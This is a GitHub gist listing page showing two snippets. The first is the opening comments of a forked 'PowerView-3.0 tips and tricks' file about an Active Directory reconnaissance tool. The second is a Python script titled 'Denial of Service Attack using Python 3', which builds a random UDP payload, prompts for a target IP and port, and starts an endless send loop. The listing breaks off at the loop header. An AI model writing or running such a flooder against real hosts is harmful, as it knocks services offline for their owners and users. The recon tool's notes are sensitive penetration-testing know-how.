Skip to content

Instantly share code, notes, and snippets.

View jan-muhammad-zaidi's full-sized avatar

Zaydee jan-muhammad-zaidi

View GitHub Profile
@jan-muhammad-zaidi
jan-muhammad-zaidi / PowerView-3.0-tricks.ps1
Created March 31, 2022 09:38 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@jan-muhammad-zaidi
jan-muhammad-zaidi / DoS.py
Created June 21, 2021 05:37
Denial of Service Attack using Python 3
import socket
import random
sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
bytes = random._urandom(10248)
ip = input("Target IP: ")
port = int(input("Enter Port: "))
sent = 0
while 1: